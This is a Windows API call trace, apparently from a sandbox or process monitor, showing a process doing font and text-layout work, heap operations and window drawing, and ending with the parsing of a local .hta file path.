[0083.675] LsSetBreaking () returned 0x0
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x271) returned 0x187ff0
[0083.675] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x17ea78
[0083.675] LsSetDoc () returned 0x0
[0083.675] LsCreateLine () returned 0x0
[0083.676] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.676] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb4) returned 0x188270
[0083.676] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xf8) returned 0x188330
[0083.676] EnumFontsW (hdc=0x5b0108ae, lpLogfont="Times New Roman", lpProc=0x739c0b47, lParam=0x39e994) returned 1
[0083.678] CreateFontIndirectW (lplf=0x39e930) returned 0xb0a0bdc
[0083.678] SelectObject (hdc=0x5b0108ae, h=0xb0a0bdc) returned 0x18a002e
[0083.678] GetTextMetricsW (in: hdc=0x5b0108ae, lptm=0x39e898 | out: lptm=0x39e898) returned 1
[0083.681] GetOutlineTextMetricsW (in: hdc=0x5b0108ae, cjCopy=0xd8, potm=0x39e798 | out: potm=0x39e798) returned 0xd8
[0083.681] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0xb0a0bdc
[0083.681] SelectObject (hdc=0x5b0108ae, h=0xb0a0bdc) returned 0x18a002e
[0083.682] GetTextFaceW (in: hdc=0x5b0108ae, c=32, lpName=0x39e9e8 | out: lpName="Times New Roman") returned 16
[0083.682] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0xb0a0bdc
[0083.682] SelectObject (hdc=0x5b0108ae, h=0xb0a0bdc) returned 0x18a002e
[0083.682] GetTextCharsetInfo (in: hdc=0x5b0108ae, lpSig=0x39e950, dwFlags=0x0 | out: lpSig=0x39e950) returned 0
[0083.682] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0xb0a0bdc
[0083.682] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xc) returned 0x17ea90
[0083.682] SelectObject (hdc=0x5b0108ae, h=0xb0a0bdc) returned 0x18a002e
[0083.682] GetFontUnicodeRanges (in: hdc=0x5b0108ae, lpgs=0x0 | out: lpgs=0x0) returned 0x27c
[0083.682] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.682] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x27c) returned 0x188af0
[0083.682] GetFontUnicodeRanges (in: hdc=0x5b0108ae, lpgs=0x188af0 | out: lpgs=0x188af0) returned 0x27c
[0083.682] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0xb0a0bdc
[0083.682] SelectObject (hdc=0x5b0108ae, h=0xb0a0bdc) returned 0x18a002e
[0083.682] GetCharWidth32W (in: hdc=0x5b0108ae, iFirst=0x20, iLast=0x7e, lpBuffer=0x39e928 | out: lpBuffer=0x39e928) returned 1
[0083.685] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x17c) returned 0x188d78
[0083.685] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x800) returned 0x188f00
[0083.685] SelectObject (hdc=0x5b0108ae, h=0x18a002e) returned 0xb0a0bdc
[0083.685] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb4) returned 0x189708
[0083.685] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb4) returned 0x1897c8
[0083.686] LsQueryLineDup () returned 0x0
[0083.686] LsDestroyLine () returned 0x0
[0083.686] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.686] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x1513d8
[0083.686] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174558
[0083.687] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x152b18, Size=0x90) returned 0x189888
[0083.687] LsSetDoc () returned 0x0
[0083.687] LsCreateLine ()
[0083.687] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.688] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x161d08, Size=0x12c) returned 0x189920
[0083.688] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x162208, Size=0x12c) returned 0x189a58
[0083.688] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x161dd8, Size=0x258) returned 0x189b90
[0083.688] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x187688, Size=0x258) returned 0x161d08
[0083.696] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.699] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.700] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x190) returned 0x187688
[0083.700] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189a58, Size=0x190) returned 0x189df0
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189b90, Size=0x320) returned 0x189f88
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x161d08, Size=0x320) returned 0x189920
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x187688, Size=0x1f4) returned 0x161d08
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189df0, Size=0x1f4) returned 0x18a2b0
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189f88, Size=0x3e8) returned 0x18a4b0
[0083.701] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x3e8) returned 0x189920
[0083.713] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.714] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x161d08, Size=0x258) returned 0x161d08
[0083.714] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a2b0, Size=0x258) returned 0x189d10
[0083.714] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a4b0, Size=0x4b0) returned 0x18a4b0
[0083.714] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x4b0) returned 0x189f70
[0083.714] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x161d08, Size=0x2bc) returned 0x189920
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189d10, Size=0x2bc) returned 0x18a968
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a4b0, Size=0x578) returned 0x18ac30
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189f70, Size=0x578) returned 0x189f70
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x320) returned 0x189920
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a968, Size=0x320) returned 0x189c48
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ac30, Size=0x640) returned 0x18ac30
[0083.715] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189f70, Size=0x640) returned 0x189f70
[0083.728] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.728] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x384) returned 0x18a5b8
[0083.728] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189c48, Size=0x384) returned 0x18b278
[0083.728] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ac30, Size=0x708) returned 0x18b608
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189f70, Size=0x708) returned 0x18a948
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a5b8, Size=0x3e8) returned 0x189920
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b278, Size=0x3e8) returned 0x189d10
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b608, Size=0x7d0) returned 0x18b608
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a948, Size=0x7d0) returned 0x18a948
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x44c) returned 0x18b120
[0083.729] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189d10, Size=0x44c) returned 0x189d10
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b608, Size=0x898) returned 0x18b608
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a948, Size=0x898) returned 0x18bea8
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b120, Size=0x4b0) returned 0x18b120
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189d10, Size=0x4b0) returned 0x189d10
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b608, Size=0x960) returned 0x18a1c8
[0083.730] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18bea8, Size=0x960) returned 0x18bea8
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b120, Size=0x514) returned 0x18b120
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189d10, Size=0x514) returned 0x18ab30
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a1c8, Size=0xa28) returned 0x18c810
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18bea8, Size=0xa28) returned 0x18d240
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b120, Size=0x578) returned 0x18b120
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x578) returned 0x18ab30
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c810, Size=0xaf0) returned 0x18b6a0
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d240, Size=0xaf0) returned 0x18d240
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b120, Size=0x5dc) returned 0x18c198
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x5dc) returned 0x18ab30
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b6a0, Size=0xbb8) returned 0x189920
[0083.741] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d240, Size=0xbb8) returned 0x18d240
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c198, Size=0x640) returned 0x18c198
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x640) returned 0x18ab30
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xc80) returned 0x189920
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d240, Size=0xc80) returned 0x18d240
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c198, Size=0x6a4) returned 0x18c198
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x6a4) returned 0x18ab30
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xd48) returned 0x189920
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d240, Size=0xd48) returned 0x18d240
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c198, Size=0x708) returned 0x18c198
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x708) returned 0x18ab30
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xe10) returned 0x189920
[0083.742] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d240, Size=0xe10) returned 0x18b240
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c198, Size=0x76c) returned 0x18c198
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18ab30, Size=0x76c) returned 0x18c910
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xed8) returned 0x189920
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0xed8) returned 0x18b240
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c198, Size=0x7d0) returned 0x18a800
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c910, Size=0x7d0) returned 0x18c910
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xfa0) returned 0x18d0e8
[0083.743] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0xfa0) returned 0x18b240
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0x834) returned 0x18a800
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18c910, Size=0x834) returned 0x189920
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x1068) returned 0x18d0e8
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x1068) returned 0x18b240
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0x898) returned 0x18a800
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x898) returned 0x189920
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x1130) returned 0x18d0e8
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x1130) returned 0x18b240
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0x8fc) returned 0x18a800
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x8fc) returned 0x189920
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x11f8) returned 0x18d0e8
[0083.744] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x11f8) returned 0x18b240
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0x960) returned 0x18a800
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x960) returned 0x189920
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x12c0) returned 0x18d0e8
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x12c0) returned 0x18b240
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0x9c4) returned 0x18a800
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0x9c4) returned 0x189920
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x1388) returned 0x18d0e8
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x1388) returned 0x18b240
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0xa28) returned 0x18a800
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xa28) returned 0x189920
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x1450) returned 0x18d0e8
[0083.745] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x1450) returned 0x18b240
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18a800, Size=0xa8c) returned 0x18e540
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xa8c) returned 0x189920
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18d0e8, Size=0x1518) returned 0x18efd8
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x1518) returned 0x18b240
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18e540, Size=0xaf0) returned 0x18a3b8
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189920, Size=0xaf0) returned 0x18c760
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18efd8, Size=0x15e0) returned 0x18efd8
[0083.746] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x18b240, Size=0x15e0) returned 0x18d258
[0083.747] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x189888, Size=0xd8) returned 0x189888
[0083.747] LsSetDoc () returned 0x0
[0083.747] LsCreateLine () returned 0x0
[0083.747] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.748] LsQueryLineDup () returned 0x0
[0083.748] LsDestroyLine () returned 0x0
[0083.748] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.748] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174678
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187b78 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.749] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.750] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f76c, lprcSrc1=0x39f76c, lprcSrc2=0x39f73c | out: lprcDst=0x39f76c) returned 1
[0083.750] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f75c | out: lprcDst=0x162e80) returned 1
[0083.750] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f77c | out: lprcDst=0x162e80) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f42c, lprcSrc1=0x39f42c, lprcSrc2=0x39f3fc | out: lprcDst=0x39f42c) returned 1
[0083.750] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f41c | out: lprcDst=0x162e80) returned 1
[0083.750] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f43c | out: lprcDst=0x162e80) returned 1
[0083.750] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.750] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f340, lprcSrc1=0x39f340, lprcSrc2=0x162e70 | out: lprcDst=0x39f340) returned 1
[0083.750] UnionRect (in: lprcDst=0x39f648, lprcSrc1=0x39f648, lprcSrc2=0x39f5f4 | out: lprcDst=0x39f648) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f4f0, lprcSrc1=0x39f4f0, lprcSrc2=0x39f578 | out: lprcDst=0x39f4f0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f588, lprcSrc1=0x39f588, lprcSrc2=0x39f4f0 | out: lprcDst=0x39f588) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f4f0, lprcSrc1=0x39f4f0, lprcSrc2=0x39f578 | out: lprcDst=0x39f4f0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f588, lprcSrc1=0x39f588, lprcSrc2=0x39f4f0 | out: lprcDst=0x39f588) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f4f0, lprcSrc1=0x39f4f0, lprcSrc2=0x39f578 | out: lprcDst=0x39f4f0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f588, lprcSrc1=0x39f588, lprcSrc2=0x39f4f0 | out: lprcDst=0x39f588) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f4f0, lprcSrc1=0x39f4f0, lprcSrc2=0x39f578 | out: lprcDst=0x39f4f0) returned 1
[0083.750] IntersectRect (in: lprcDst=0x39f588, lprcSrc1=0x39f588, lprcSrc2=0x39f4f0 | out: lprcDst=0x39f588) returned 1
[0083.751] IntersectRect (in: lprcDst=0x39f5e0, lprcSrc1=0x39f5e0, lprcSrc2=0x39f578 | out: lprcDst=0x39f5e0) returned 1
[0083.751] IntersectRect (in: lprcDst=0x39f42c, lprcSrc1=0x39f42c, lprcSrc2=0x39f3fc | out: lprcDst=0x39f42c) returned 1
[0083.751] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f41c | out: lprcDst=0x162e80) returned 1
[0083.751] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f43c | out: lprcDst=0x162e80) returned 1
[0083.751] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.751] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.751] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.751] UnionRect (in: lprcDst=0x39f988, lprcSrc1=0x39f988, lprcSrc2=0x39f934 | out: lprcDst=0x39f988) returned 1
[0083.751] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152b18
[0083.751] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152b18 | out: hHeap=0x110000) returned 1
[0083.751] RedrawWindow (hWnd=0x1034a, lprcUpdate=0x39fa08, hrgnUpdate=0x0, flags=0x21) returned 1
[0083.752] GetFocus () returned 0x1034a
[0083.752] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8) returned 0x1696e0
[0083.752] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4) returned 0x1696f0
[0083.752] GetFocus () returned 0x1034a
[0083.752] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.752] GetCapture () returned 0x0
[0083.752] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152b18
[0083.752] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.753] GetCurrentThreadId () returned 0xe84
[0083.753] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.753] GetCurrentThreadId () returned 0xe84
[0083.753] GetCurrentThreadId () returned 0xe84
[0083.753] GetFocus () returned 0x1034a
[0083.753] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.754] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.754] GetCurrentThreadId () returned 0xe84
[0083.754] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.756] GetCurrentThreadId () returned 0xe84
[0083.756] GetCurrentThreadId () returned 0xe84
[0083.756] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.756] GetCapture () returned 0x0
[0083.756] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.757] GetCurrentThreadId () returned 0xe84
[0083.757] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.757] GetCurrentThreadId () returned 0xe84
[0083.757] GetCurrentThreadId () returned 0xe84
[0083.757] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.757] GetCapture () returned 0x0
[0083.757] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.758] GetCurrentThreadId () returned 0xe84
[0083.758] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.758] GetCurrentThreadId () returned 0xe84
[0083.758] GetCurrentThreadId () returned 0xe84
[0083.758] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x17ce90, Size=0xe4) returned 0x162208
[0083.758] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.758] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.759] GetCurrentThreadId () returned 0xe84
[0083.759] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.759] GetCurrentThreadId () returned 0xe84
[0083.759] GetCurrentThreadId () returned 0xe84
[0083.759] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f6b0 | out: lpPoint=0x39f6b0) returned 1
[0083.759] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x166ed0
[0083.760] GetCurrentThreadId () returned 0xe84
[0083.760] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166ed0 | out: hHeap=0x110000) returned 1
[0083.760] GetCurrentThreadId () returned 0xe84
[0083.760] GetCurrentThreadId () returned 0xe84
[0083.760] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152b48 | out: hHeap=0x110000) returned 1
[0083.760] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696e0 | out: hHeap=0x110000) returned 1
[0083.760] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152b18 | out: hHeap=0x110000) returned 1
[0083.760] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696f0 | out: hHeap=0x110000) returned 1
[0083.760] GetCurrentThreadId () returned 0xe84
[0083.760] GetFocus () returned 0x1034a
[0083.761] GetFocus () returned 0x1034a
[0083.761] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39fa00 | out: ppu=0x39fa00) returned 0x0
[0083.761] IUnknown:AddRef (This=0x13c184) returned 0x4
